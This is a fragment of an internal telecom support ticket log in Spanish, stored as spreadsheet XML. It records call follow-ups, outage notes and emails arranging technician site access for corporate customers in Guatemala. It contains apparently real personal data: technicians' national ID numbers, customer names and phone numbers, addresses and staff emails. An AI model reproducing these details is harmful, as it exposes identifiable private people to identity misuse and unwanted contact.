PARA: OPERACIONES@AEROCLUBGUATEMALA.COM &lt;OPERACIONES@AEROCLUBGUATEMALA.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PERMISOS | 345500006T | AEROCLUB DE GUATEMALA
BUENA TARDE ESTIMADO CLIENTE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESTARA EN SITIO.
DIRECCIÓN:  INTERNET.- N15 4C 9 W88 56 1 RIO DULCE IZABAL
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS
LESTER GIOVANNY ORELLANA SÁNCHEZ   DPI: 1787353451801
ERICK ESTUARDO APEN VANEGAS       DPI 3328428861804
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>F4618485</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SONIA CHAVEZ 71468385 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE CON EL SERVICIO
-ID 2001500644</t>
  </si>
  <si>
    <t>F4618489</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN ESPAÑA 43944500 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001496630</t>
  </si>
  <si>
    <t>F4618494</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 30246026 RESPONDE NATALY MENCIONA QUE YA APLICARON LAS PRUEBAS DE PRIMER NIVEL CON CLIENTE FINAL
-ID 2001502186
NOMBRE DEL CLIENTE: INNOVA OUTSOURSING, S.A.
UBICACIÓN:6A. AVENIDA 6-12, APARTAMENTO "A" SIPACATE ESCUINTLA
CONTACTO EN SITIO:ALVARO TOBAR - 59519635
HORARIO DE ATENCION:HASTA LAS 16 HRS
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4618510</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE AL 2243-7253 CONTESTA EL SEÑOR NOE QUIEN SOLICITA QUE SE LE COMPARTA EL DICTAMEN TECNICO **
-ID 2001703985
**</t>
  </si>
  <si>
    <t>**SE ENVIA CORREO SOLICITANDO  DICTAMEN TECNICO **
DE: VERONICA RAQUEL VASQUEZ CORTEZ
ENVIADO: MARTES, 28 DE JUNIO DE 2022 11:08
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: 506400ON || CORPORACION DE SUPERMERCADOS UNIDOSDE NICARAGUA S.A. || SD SD1138961</t>
  </si>
  <si>
    <t>F4618522</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE CON LOS NOMBRES DE LOS 3 TECNICOS PARA LA GESTION DE LOS PERMISOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 27 DE JUNIO DE 2022 13:21
PARA: EVA WESTPHAL &lt;EVA.WESTPHAL@CWC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: GT-DMC &lt;GT-DMC@CWC.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;
ASUNTO: RE: [EXT] RE: SR10639702 - 5023650.GT - HOTELES, SA (PORTA HOTEL ANTIGUA) - SERVICIO ALARMADO
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA LA GESTION DE LOS PERMISOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 27 DE JUNIO DE 2022 13:10
PARA: EVA WESTPHAL &lt;EVA.WESTPHAL@CWC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: GT-DMC &lt;GT-DMC@CWC.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;
ASUNTO: RE: [EXT] RE: SR10639702 - 5023650.GT - HOTELES, SA (PORTA HOTEL ANTIGUA) - SERVICIO ALARMADO
BUENA TARDE
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
MELVIN DANIEL PEREZ BAUTISTA   1585 28700 0301
DAVID FLORENCIO ROMERO BENITO  2619 94115 03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618538</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FERNANDO JUAREZ AL 41230002 INDICA QUE AUN VE DOWN EL SERVICIO SE LE SOLICITA UN MOMENTO PERO CORTA LLAMADA || SE NOTIFICA A GESTOR **
-ID 2001477854
**</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREOS, AUN SIN RESPUESTA DE PARTE DEL CLIENTE, SE LE LLAMA A FERNANDO JUAREZ 41230002 ID: 2001617746, CL CONFIRMA SERVICIO OK, SOLICITA SE DEJE EN MONITOREO HASTA MAÑANA 28/06 A LAS 12:00 DEL MEDIO DIA SE NOTIFICA A AXELS.LOPEZ VIA SKYPE PARA EL CAMBIO A ETAPA QUE CORRESPONDE | WIP
*-*</t>
  </si>
  <si>
    <t>F4618544</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DAVID  BARAHONA 94637159 CLIENTE CONFIRMA SERVICIO ESTABLE Y  OPERATIVO E INDICA QUE ESTAN REVISANDO INTERNAMENTE **
-ID 2001492384
**</t>
  </si>
  <si>
    <t>F4618547</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. LIC LUIS URCULLO / 84542264 CONFIRMA EQUIPOS ENCENDIDOS, TAMBIEN APLICARON REINICIO, ENLACE CONTINUA DOWN CONFIRMA DIRECCION SE ADJUNTA PLANTILLA.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS URCULLO 84542264 PARA BRINDAR RETROALIMENTACION
-ID 2001497690</t>
  </si>
  <si>
    <t>F4618559</t>
  </si>
  <si>
    <t>CLIENTE MARIO PENAES 58655720 APOYA UBICANDO EQUIPO ASMI54L ALARMADO CON PWR VERDE, ALM ROJO Y SYNC1 ROJO. LO REINICIA PERO CONTINUA EN EL MISMO ESTADO. UBICA AETHRA 6044 SIN ALARMAS. SE TIENE POSIBLE LINEA ABIERTA. SE ABRIRA WO PARA LA REVISIÓN. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4618567</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIA AL 32068663 SE CONTACTA PERO CORTA LLAMADA SE INTENTARA LUEGO **
-ID 2001485751
**</t>
  </si>
  <si>
    <t>F4618580</t>
  </si>
  <si>
    <t>SE PLATICA CON ROBERTO NAVAS DE DESPACHO NOS INFORMA QUE EL PERSONAL DE FO SE ENCUENTRA DIRIGIÉNDOSE AL PR YA QUE SE ENCUENTRAN A 2 HORAS APROXIMADAS DEL PR.
2001664640
COLA:
NOMBRE: A: 50378428700
NÚMERO: 50378428700
DURACIÓN: 0:01:12
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50378428700
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.CORADO
FECHA Y HORA LOCALES: 28/06/2022 09:13:57</t>
  </si>
  <si>
    <t>F4618598</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER TORRES 42899414 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001499250</t>
  </si>
  <si>
    <t>F4618599</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  MIRIAM JACINTOS AL 74075197  INDICA QUE ESTA EN ALMUERZO SOLICITA QUE SE LE LLAME DESPUES DE LAS 13 HRS **
ID 2001519062
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIRIAM JACINTOS 74075197 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001509786</t>
  </si>
  <si>
    <t>F4618606</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIAN LOPEZ-24801688 SE TIENE EN LINEA ##
2001482893
COLA:
NOMBRE: A: 24801688
NÚMERO: 24801688
DURACIÓN: 0:00:29
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 24801688
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/06/2022 11:06:09
2001483066
COLA:
NOMBRE: A: 59827706
NÚMERO: 59827706
DURACIÓN: 0:00:02
ESTADO: MARCANDO
DETALLES: 59827706
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/06/2022 11:06:20</t>
  </si>
  <si>
    <t>CLIENTE REALIZA PRUEBAS DE LLAMADAS ENTRANTES Y TODO OK- PERO PBX NO PUEDE SACAR LLAMADAS## CLIENTE DESCONOCE COMO REINICIAR SU PBX POR QUE ESTA PARCIALMENTE INHIBIDA, POR LO QUE ESCALARA CON SU PROVEEDOR DE PBX PARA QUE LE AYUDE ##SE PROCEDE AL CIERRE##CLIENTE VALIDA##</t>
  </si>
  <si>
    <t>F4618631</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIELOS RODRIGUEZ  72314189 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO DE PR  64549594 - MARISOL LOPEZ PERO  SOLICITA SE LLAME A LAS 13:15 PORQUE ESTAN EN SU TIEMPO DE ALMUERZO
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001510794</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARISOL LOPEZ AL 64549594  INDICA QUE AUN NO PUEDE REALIZAR LLAMADAS | SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 2001530786
**</t>
  </si>
  <si>
    <t>F4618632</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE OSMAR AROCHE AL 43912997 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001535032 - 2001536727
**</t>
  </si>
  <si>
    <t>F4618636</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A LUIS CHOC/EJECUTIVO CLARO Y A MARCO VENTURA/CLIENTE BANTIGUA, ÉSTE ÚLTIMO INDICA QUE HAY TÉCNICO CLARO FUERA DE LAS INSTALACIONES DE BANTIGUA CENTRAL, PERO NO LE ENVIARON DATOS POR CORREO PARA PERMITIR EL INGRESO. SE PIDE APOYO A MIGUEL RODRÍGUEZ/GESTOR N1; EN TRIPARTITA ÉSTOS, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE SR. LUIS 41230002 SE LE INFORMA QUE A NIVEL DE CLARO ESTA FUNCIONANDO CORRECTAMENTE, SE ENVIA CORREO...</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR 24205032 CONTESTA EL SEÑOR  MARVIN SOTO SOLICITA QUE SE DEJE EN OBSERVACION PARA LAS 18:00 HRS **
-ID 2001537301
**</t>
  </si>
  <si>
    <t>F4618644</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NOE UTUY 46840847 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001610608</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE NOE UTUY AL 46840847 NO RESPONDE , ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 2001532912
**</t>
  </si>
  <si>
    <t>F4618654</t>
  </si>
  <si>
    <t>SE VALIDA QUE YA NOS AGREGARON A LA COLA DE CORREOS:
RE: F4618654 || 859100003T || CLIENTE REPORTA CAIDA TOTAL
CLIENTE JONATHAN ACAJABON AUN NO RESPONDE, POR LO QUE SE PROCEDE A CONTACTARLO AL 37589581 ID 2001652509 / 2001652670 INGRESA DIRECTO A BUZON DE VOZ, SE VALIDA TICKETS ANTERIORES ALGÚN OTRO CONTACTO. Y NO HAY, SOLO APARECE EL DE SUHEIDY PAPPA AL 58682600 ID 2001653756 ATIENDE Y COMENTA QUE SE CONTACTARA EN LINEA CON EL CL Y LE CONFIRMA QUE SI ESTA OPERATIVO Y AUTORIZA EL CIERRE DEL TICKET SE NOTIFICA AL GESTOR MIGUELAN.RODRIGUEZ VÍA SKYPE PARA EL CIERRE.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JONATHAN ACAJABON 37589581 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001611591</t>
  </si>
  <si>
    <t>F4618664</t>
  </si>
  <si>
    <t>SE LLAMO A LA EXTENSION  INDICADO EN BITACORA PERO NO SE OBTUVO RESPUESTA.
3001978507
COLA:
NOMBRE: A: 23386801
NÚMERO: 22282801
DURACIÓN: 0:01:40
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 22282801
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 5/07/2022 16:10:10</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR A CENTRAL A LAS EXTENSIONES PROP0RCIONADAS PERO NO SE TIENE RESPUESGTA
3001727726
COLA:
NOMBRE: A: 23386801
NÚMERO: 22282801
DURACIÓN: 0:06:38
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 22282801
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 4/07/2022 12:20:51</t>
  </si>
  <si>
    <t>SE DEBERÁ LLAMAR A CLIENTE PARA HACER PRUEBAS EL DÍA LUNES EN HORARIO HABIL</t>
  </si>
  <si>
    <t>F4618668</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MILTON ROSALES-76302006 ##SE TIENE EN LINEA ##
2001504244
COLA:
NOMBRE: A: 0050376302006
NÚMERO: 0050376302006
DURACIÓN: 0:00:27
ESTADO: CONECTADA
DETALLES: 0050376302006
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/06/2022 12:03:21</t>
  </si>
  <si>
    <t>CLIENTE SE DIRIGE HACIA EQUPOS###</t>
  </si>
  <si>
    <t>F4618671</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LETISIA 70709163 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001565120 - 2001565351</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 70709163 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001574423</t>
  </si>
  <si>
    <t>F4618689</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SERGIO REYES AL 22140161 INDICA QUE ESTA REALIZANDO PING DE EXTREMO A EXTREMO PERO NO RESPONDE || SE NOTIFICA A GESTOR **
-ID 2001541065
**</t>
  </si>
  <si>
    <t>F4618692</t>
  </si>
  <si>
    <t>ENLACE AFECTADO POR CORTE DE FO EN SECTOR; SE HABLÓ CON EDSON CARDONA/CLIENTE 55153914 Y SE LE BRINDA AVANCES DEL TICKET.
CLIENTE INDICA SI ES NECESARIO INGRESAR  SUS INSTALACIONES, HAY PERSONAL DE TURNO QUE PUEDE ATENDER, CUALQUIER APOYO PIDE SE LE LLAME, SE INFORMA DE LO ANTERIOR A GESTIÓN N1 VÍA SKYPE.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EXSON CARDONA AL 55153914  INDICA QUE LA FO QUE VA DEL POSTE ESTA ROTA SOLICITA VISITA TECNICA **
HORARIO DE ATENCION: 7:00 A 18:00 HRS
GESTION DE PERMISOS:SOLO IDENTIFICADOS
DIRECCCION: KILOMETRO 19.5 ALDEA EL CHATO MANZANA 18 LOTE 10 ZONA 18 GRANJA EL BAMBU GUATEMALA
ATENDERA EN SITIO: ESTUARDO OROZCO
-ID 2001520412
**</t>
  </si>
  <si>
    <t>F4618693</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AMALIA REYES AL 45707476 NO RESPONDE || ENVIA A BUZON , SE INTENTARA LUEGO**
-ID 2001526850
**</t>
  </si>
  <si>
    <t>F4618694</t>
  </si>
  <si>
    <t>**SE LLAMA A  CLIENTE SELVYN CHAY AL 47700119 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001528236
**</t>
  </si>
  <si>
    <t>F4618698</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JONATHAN SOLIS 54145734 MENCIONA QUE PERSISTE EL INCONVENIENTE PERO NO SE ENCUENTRA EN PR POR LO QUE BRINDA OTRO CONTACTO ADOLFO - 57846846
-ID 2001567515</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ADOLFO - 57846846 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001568611</t>
  </si>
  <si>
    <t>F4618703</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL TREJO 25562633 - 25562920 CLIENTE SOLICITA SE VALIDE A NIVEL DE PLANTA EXTERNA
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001513573  - 2001513836</t>
  </si>
  <si>
    <t>F4618714</t>
  </si>
  <si>
    <t>F4618717</t>
  </si>
  <si>
    <t>CLIENTE JONATHAN NISTAL 77203777 UBICA EQUIPO ASMI52 SINCRONIZADO, SE LE SOLICITA APOYO PARA REINICIAR EL ASMI52 Y PLANTA PBX, DEJA EN ESPERA EN LO QUE REINICIA SU PBX. CLIENTE COMENTA QUE SU SERVICIO TENIA BLOQUEO ADMINISTRATIVO. SE LE QUITÓ EL BLOQUEO PERO LAS LLAMADAS SALIENTES NO RESTABLECIERON, EN PRUEBA DE LLAMADA AL LEVANTAR EL TELÉFONO SÍ DA TONO, PERO AL MARCAR EL NÚMERO LA LLAMADA SE CORTA.
ID DE LLAMADA: 2001515783</t>
  </si>
  <si>
    <t>LUEGO DEL REINCIO DE EQUIPOS, CLIENTE AÚN NO LOGRA SACAR LLAMADAS, SE OBSERVA QUE CLIENTE NO TIENE BLOQUEO, POR LO QUE SE ABRIRÁ WO PARA CERTIFICAR EL E1. ID: 2001518978</t>
  </si>
  <si>
    <t>F4618720</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO REYES 22140161 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001613330</t>
  </si>
  <si>
    <t>F4618722</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MYNOR GUZMAN 23792461 RESPONDE DAVID QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001552970</t>
  </si>
  <si>
    <t>F4618725</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22437253 MENCIONA QUE PERSISTE EL INCONVENIENTE CON EL SERVICIO, SE NOTIFICA QUE NO OBSERVAMOS PROBLEMAS
SE LE SOLICITA A CLIENTE PODER COMPARTIR LAS PRUEBAS POR CORREO
-ID 2001524441</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 27 DE JUNIO DE 2022 13:11
PARA: NOE PEREZ (VENDOR) &lt;NOE.PEREZ1@WALMART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
CC: JONATHAN QUINTANILLA &lt;JONATHAN.QUINTANILLA@WALMART.COM&gt;
ASUNTO: RE: ENLACE INESTABLE DE CENTRO DE DISTRIBUCION SAN JUAN OPICO ID: IP2025181
BUENA TARDE
     EN SEGUIMIENTO AL CASO SD1139056 SE VALIDA QUE NO OBSERVAMOS INCONVENIENTE A NIVEL DE CLARO SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4618732</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FREDY AL 55759282  CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
ID 2001573345
**</t>
  </si>
  <si>
    <t>F4618740</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE INDICA QUE ESTA OCUPADO ATENDIENDO A CLIENTES EL DIA DE HOY Y NO SE ENCUENTRA CERCA DE SITIO INDICA QUE SE LLAME MAÑANA A LAS 10:00 AM PARA REALIZAR PRUEBAS EN CONJUNTO SI EN DADO CASO NO RESTABLECE EL SERVICIO MENCIONA QUE ESTARIA APOYANDO CON DATOS PARA VISITA-</t>
  </si>
  <si>
    <t>*- JORGE VALVERDE 506-60760533 (CLIENTE) ENVIA DIRECTO A BUZON, SE UBICA EN TT ANTERIORES LOS NUMEROS +506 44040820 / 70185229, NO RESPONDE, SE LLAMARA LUEGO -*
3001007009
3001007151</t>
  </si>
  <si>
    <t>SE TRATA DE CONTACTAR A  CLIENTE JORGE VALVERDE NIETZEN, LUEGO DE DOS INTENTOS NO SE TIENE RESPUESTA
[9:38] JUAN CARLOS LOPEZ SANCHEZ
3001470805
COLA:
NOMBRE: A: 50660760533
NÚMERO: 50660760533
DURACIÓN: 0:00:40
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50660760533
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 2/07/2022 09:38:12
[9:39] JUAN CARLOS LOPEZ SANCHEZ
3001470907
COLA:
NOMBRE: A: 50660760533
NÚMERO: 50660760533
DURACIÓN: 0:00:19
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50660760533
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 2/07/2022 09:39:35</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, NO SE LOGRA CONTACTAR CON CL-..
INSTITUTO FRMACION AERONAUTICA - CONTR0001294527OC</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A CLIENTE SIN EMBARGO ENVIA DIRECTO A BUZON--
2001912344
COLA:
NOMBRE: A: 50660760533
NÚMERO: 50660760533
DURACIÓN: 0:00:04
ESTADO: CONECTADA
DETALLES: 50660760533
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: YENSICALGUA
FECHA Y HORA LOCALES: 29/06/2022 10:34:04</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE A CLIENTE PARA REALIZAR PRUEBAS SIN EMBARGO ENVIA DIRECTO A BUZON--
2001905578
COLA:
NOMBRE: A: 50660760533
NÚMERO: 50660760533
DURACIÓN: 0:00:05
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50660760533
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: YENSICALGUA
FECHA Y HORA LOCALES: 29/06/2022 10:15:18</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JORGE VALVERDE 506-60760533 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001575139
**</t>
  </si>
  <si>
    <t>F4618745</t>
  </si>
  <si>
    <t xml:space="preserve"> IRINA ESCOBEDO AL NUMERO 70127495 + CLIENTE SR. MARCO  SE LE INFORMA QUE A NIVEL DE CLARO TODO FUNCIONA CORRECTAMENTE, INFORMA QUE TIENEN UN EQUIPO DE MARCA NEXT SOLUTION EL CUAL LES PROPORCIONA WI-FI ESTE DISPOSITIVO NO ESTA PROPORCIONANDO LA RED WI-FI NO SE ESTAN VIENDO LOS SSID, SE LE EXPLICA QUE TIENE QUE ESCALAR A SU ENCARGADO IT PARA LA REVISION DE SUS EQUIPOS INTERNOS WLAN YA QUE CLARO NO ADMINISTRA SU RED WLAN, CONFIRMA DE ENTERADO, SE PROCEDE AL CIERRE DEL INCIDENTE. 2001540386-</t>
  </si>
  <si>
    <t>F4618749</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE MELISA CASTRO-38422369</t>
  </si>
  <si>
    <t>SE TIENE  A CLIENTE EN LINEA CLIENTE MELISA CASTRO-38422369
2001516547
COLA:
NOMBRE: A: 38422369
NÚMERO: 38422369
DURACIÓN: 0:01:11
ESTADO: CONECTADA
DETALLES: 38422369
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/06/2022 12:39:41</t>
  </si>
  <si>
    <t>F4618754</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2420¿7200  CONTESTA EL SEÑOR JOSE QUIEN INDICA QUE ELLOS ESTARAN RESPONDIENDO EL CORREO EN UN MOMENTO BRINDANDO LOS ACCESOS Y CONFIRMAN VISITA**
-ID 300114678 - 3001125031
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, SE COORDINA VISITA CON CLIENTE PARA EL DIA LUNES 10:00 AM , ASI MISMO SE SOLICITA DATOS DE PERSONAL DE TAVSA QUE ESTARA EN SITIO PARA PODER COMUNICARNOS, YA QUE EN DOS OCACIONES PERSONAL TENICO SE HACE PRESENTE Y NO SE ENCUENTRA CON PERSONAL DE CLIENTE
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 2 DE JULIO DE 2022 12:12
PARA: LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;; MYNOR HERNÁNDEZ &lt;MYNOR.HERNANDEZ@TAV.COM.GT&gt;; LGALINDO@5B.COM.GT &lt;LGALINDO@5B.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; MONITOREO FALLAS ATMS &lt;OPERADORES.ATM4@TAV.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; ORLANDO RAMIREZ &lt;ORAMIREZ@5B.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE ACCESOS || CC_TYT_GT_ATM1733 || F4618754
BUENA TARDE
ESTIMADO CLIENTE DANDO SEGUIMIENTO AL INCIDENTE REPORTADO LE COMENTO QUE YA SE REALIZARON DOS VISITAS CON PERSONAL TÉCNICO EL CUAL SE VALIDA QUE ATM  1733 SE ENCUENTRA DENTRO DEL COMERCIAL, LA TRINIDAD A UN COSTADO DE BANCO AGRO MERCANTIL,  SOLICITAMOS DE SU APOYO EN COORDINAR VISITA NUEVAMENTE EL DÍA LUNES A LAS 10:00 AM, DE LA MISMA MANERA SOLICITAMOS NOMBRE Y NUMERO DE LA PERSONA DE TAVSA QUE ESTARÁ EN SITIO ESTO PARA PODER COORDINAR DE MANERA MAS SEGURA Y QUE PERSONAL DE CAMPO PUEDA COMUNICARSE, ACTUALMENTE SERVICIO NO SE ENCUENTRA OPERATIVO
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EN CUAL SE VALIDA DIRECCION, SE LLAMA A SUPERVISOR JORGE SALAZAR COMENT QUE TECNICO ASIGANDO ES GODINEZ PEREZ, CARLOS AUGUSTO   DPI:  1626333351001   58263059, VIISTA SE PROGRAMA PARA MAÑANA A LAS 10.00 AM
CENTRO COMERCIAL LA TRINIDAD 6 CALLE 12-124 ZONA 1 COATEPEQUE QUETZALTENANGO, LOCAL 8
3001229358
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4818
DURACIÓN: 0:04:17
ESTADO: CONECTADA
DETALLES: 4818
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 30/06/2022 18:10:22</t>
  </si>
  <si>
